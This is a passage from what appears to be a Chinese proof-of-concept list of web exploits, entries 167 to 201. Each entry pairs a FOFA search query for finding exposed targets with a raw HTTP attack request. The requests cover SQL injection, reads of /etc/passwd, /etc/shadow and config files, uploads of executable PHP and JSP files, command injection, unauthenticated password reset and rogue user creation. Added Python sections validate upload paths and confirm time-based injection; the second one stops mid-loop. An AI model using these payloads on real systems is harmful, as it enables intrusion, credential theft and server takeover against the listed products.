Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 Value Management System DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 Vehicle Positioning and Monitoring Platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD License Plate Recognition Camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom Gateway Configuration Management System rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C Campus Network Self-Service System flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 Engineering Management System arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 Enterprise Standardization Management System UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 Enterprise Standardization Management System AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Library Cluster Management System updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus Gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 Application Virtualization System SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 Video Conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical image viewer deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
Stacked query in the documentUniqueId parameter; a vulnerable target (MSSQL backend) delays its response by 5 seconds (WAITFOR DELAY '0:0:5').

GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA: title=="短视频矩阵营销系统"
The poi parameter accepts a file:// URL, so local files are returned in the response.

POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 (ESAFENET) electronic document security management system NavigationAjax SQL injection
FOFA: body="/CDGServer3/index.jsp"
Time-based injection in the id parameter (MSSQL waitfor delay, 5 seconds). Keep the /js/../ segment in the request path; it is part of the published PoC.

POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP (foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA: title="用户登录_富通天下外贸ERP"
The name query parameter determines the extension of the stored file (here .ashx) and the raw POST body becomes its content, so an ASP.NET generic handler can be written and then executed by the server. The handler in the PoC only writes the string "test".

POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setSystemTimeAction command execution
FOFA: body="山石云鉴主机安全管理系统"
Three-step PoC: obtain a CSRF token for a chosen session id, send the command with that token, then read back the file the command created. The param value is a Python expression, here os.system(...).

Step 1. Fetch a CSRF token for the session id in the cookie:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2. Send the command; {{token}} is the value returned in step 1 and PHPSESSID must be the same:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3. Confirm execution by fetching the file written in step 2 (its body should be 23333333333456):
GET /master/img/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operation management platform uploadAttachmentServlet arbitrary file upload
FOFA: app="FE-协作平台"
Quick check: a response from /servlet/uploadAttachmentServlet indicates the servlet is exposed. The filename of the uploadFile part is not sanitised, so the ../ sequence below drops hello.jsp into the exploded fe.war directory, where the application server executes it.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
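Entries 188 and 190 read arbitrary files through a user-supplied path or file:// URL, and entries 192 and 194 store an upload under an attacker-chosen name or extension (194 even carries ../ in the filename). The server-side check is the same in both directions: reduce the name to something the server controls, refuse executable extensions, and resolve the final path to confirm it still lies inside the intended directory. The Python below is an added example written for this page, not code from any of the products listed; the directory names, the extension lists and the function names are assumptions for the demo.

```python
import os
import re
from pathlib import Path
from typing import Optional

# Assumed policy for the demo (not taken from any product): extensions the
# application server would execute are never accepted, whatever else the name
# looks like, and only the handful the upload feature actually needs pass.
EXECUTABLE = {".php", ".php5", ".phtml", ".jsp", ".jspx", ".asp", ".aspx",
              ".ashx", ".asmx", ".cgi"}
ALLOWED = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,100}$")


def contained(base: Path, candidate: Path) -> Optional[Path]:
    """Resolve candidate (collapsing .. and following symlinks) and return it
    only if the result still lies inside base; otherwise None."""
    base = base.resolve()
    target = candidate.resolve()
    try:
        target.relative_to(base)
    except ValueError:
        return None
    return target


def safe_upload_path(upload_dir: str, client_filename: str) -> Optional[Path]:
    """Map an attacker-controlled filename to a path inside upload_dir, or None.

    Only the last path component is kept, so ../../jboss/web/fe.war/hello.jsp
    (entry 194) reduces to hello.jsp; the character set is restricted; and the
    decision looks at the whole suffix chain, so hello.jsp, shell.php.jpg and
    the bare .ashx of entry 192 are all rejected.
    """
    name = os.path.basename(client_filename.replace("\\", "/"))
    if not SAFE_NAME.match(name):
        return None
    suffixes = {s.lower() for s in Path(name).suffixes}
    if suffixes & EXECUTABLE or Path(name).suffix.lower() not in ALLOWED:
        return None
    return contained(Path(upload_dir), Path(upload_dir) / name)


def safe_read_path(base_dir: str, requested: str) -> Optional[Path]:
    """Resolve a user-supplied download path (entries 188 and 190) inside base_dir.

    URL schemes (file:///etc/passwd), absolute paths (/etc/passwd) and NUL bytes
    are refused outright; anything else is resolved and must stay under base_dir,
    which also catches ../ sequences and symlinks pointing outside it.
    """
    if "://" in requested or requested.startswith(("/", "\\")) or "\x00" in requested:
        return None
    return contained(Path(base_dir), Path(base_dir) / requested)


if __name__ == "__main__":
    for name in ("photo.jpg", "../../../../../jboss/web/fe.war/hello.jsp",
                 ".ashx", "shell.php.jpg"):
        print(f"upload {name!r:48} -> {safe_upload_path('uploads', name)}")
    for req in ("docs/a.pdf", "/etc/passwd", "file:///etc/passwd", "../../etc/passwd"):
        print(f"read   {req!r:48} -> {safe_read_path('files', req)}")
```

Storing the file under a server-generated name (a random id plus the validated extension) and serving the upload directory without execute permissions removes the remaining dependence on the client-supplied name entirely.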

195. 飞鱼星 (Volans) enterprise internet behaviour management system send_order.cgi command execution
FOFA: title=="飞鱼星企业级智能上网行为管理系统"
The name field of the JSON body is concatenated into a shell command; the PoC runs uname -a.

POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA: body="/cas/themes/zbvc/js/jquery.min.js"
Unauthenticated password reset: xgh is the account identifier and newPass the password to set.

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host: your-ip
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 (customer resource management system) Quotegask_editAction SQL injection
FOFA: app="浙大恩特客户资源管理系统"
UNION-based injection in the goonumStr parameter; the payload selects 111*111, so look for 12321 in the response.

GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
Command injection in the sid parameter of the LuCI aliyundrive-webdav page. The encoded value decodes to `ls />/www/aaa.txt`, so the root directory listing is written under /www (the uhttpd web root on OpenWrt) and can then be fetched as /aaa.txt. A valid sysauth session cookie is required.

GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit CMS assetsmanager/upload file upload
FOFA: title="Authenticate Please!"
Authenticated upload: once a session exists, the asset manager accepts a .php file (the PoC logs in as admin/admin).

Step 1. Fetch the login page; its body contains the csfr token:
GET /auth/login?to=/ HTTP/1.1

Response 200, body contains:
csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

Step 2. Log in with that token to obtain a session cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response 200 with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Step 3. Upload with the session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

The file is then reachable at /storage/uploads/tttt.php (it deletes itself after the first request).

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA: app="海洋CMS"
Time-based injection in the id parameter (MySQL sleep(5)); a vulnerable target delays its response by 5 seconds.

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) all-media news editing system binary SQL injection
FOFA: body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
The TableName parameter is concatenated into the SQL statement. Decoded, the payload is DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH, so a vulnerable MSSQL backend delays its answer by 5 seconds.

POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

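Entries 186, 187, 189, 191, 200 and 201 above rely on a time delay (MySQL sleep(), MSSQL WAITFOR DELAY, SQLite RANDOMBLOB) as the only evidence of injection, and one slow response is weak evidence on a loaded server. The Python helper below is an added example, not part of the original list or of any affected product: it interleaves benign and delaying requests, compares every delayed sample against the baseline median, and only then reports the injection as confirmed. The send callable, the PAYLOAD_PAIRS table and the simulate() fake target are assumptions for illustration; against a live host, send is whatever performs the real request (for instance a wrapper around requests that substitutes the payload into the injectable parameter) and clock stays time.monotonic.

```python
import statistics
import time
from typing import Callable, Dict, Tuple

# Benign/delaying payload pairs lifted from the entries above: the MySQL
# sleep() form of entry 200 and the MSSQL WAITFOR DELAY form of entry 189.
# Both pause the database for 5 seconds, hence DELAY_SECONDS.
DELAY_SECONDS = 5.0
PAYLOAD_PAIRS: Dict[str, Tuple[str, str]] = {
    "mysql": ("1", "(select(0)from(select(sleep(5)))v)"),
    "mssql": ("1", "1';WAITFOR DELAY '0:0:5'--"),
}


def confirm_time_based(
    send: Callable[[str], object],
    benign: str,
    sleeping: str,
    trials: int = 3,
    delay: float = DELAY_SECONDS,
    tolerance: float = 1.0,
    clock: Callable[[], float] = time.monotonic,
) -> Dict[str, object]:
    """Report whether `sleeping` really delays the server relative to `benign`.

    send(payload) performs one request with payload substituted into the
    injectable parameter (entry 200's id, entry 189's documentUniqueId, ...)
    and returns only after the response has been read. Benign and delaying
    requests are interleaved so a server that is slowing down over time cannot
    bias one group, and every delayed sample has to exceed the baseline median
    by at least delay - tolerance: one slow benign response cannot create a
    false positive, and one fast "delayed" response (a WAF short-circuiting
    the request, for instance) is enough to withhold confirmation.
    """

    def timed(payload: str) -> float:
        start = clock()
        send(payload)
        return clock() - start

    baseline, delayed = [], []
    for _ in range(trials):
        baseline.append(timed(benign))
        delayed.append(timed(sleeping))
    base_med = statistics.median(baseline)
    floor = base_med + delay - tolerance
    return {
        "baseline_median": base_med,
        "delayed_median": statistics.median(delayed),
        "confirmed": all(sample >= floor for sample in delayed),
    }


def simulate(vulnerable: bool, delay: float = DELAY_SECONDS):
    """Offline stand-in for a target (an assumption for the demo, not a real
    server): returns (send, clock), where send advances a fake clock by a
    normal response time plus `delay` when the payload contains a sleep or
    WAITFOR and the simulated target is vulnerable."""
    now = [0.0]

    def send(payload: str) -> None:
        now[0] += 0.05
        lowered = payload.lower()
        if vulnerable and ("sleep(" in lowered or "waitfor" in lowered):
            now[0] += delay

    return send, (lambda: now[0])


if __name__ == "__main__":
    for label, vulnerable in (("vulnerable", True), ("patched", False)):
        send, clock = simulate(vulnerable)
        benign, sleeping = PAYLOAD_PAIRS["mysql"]
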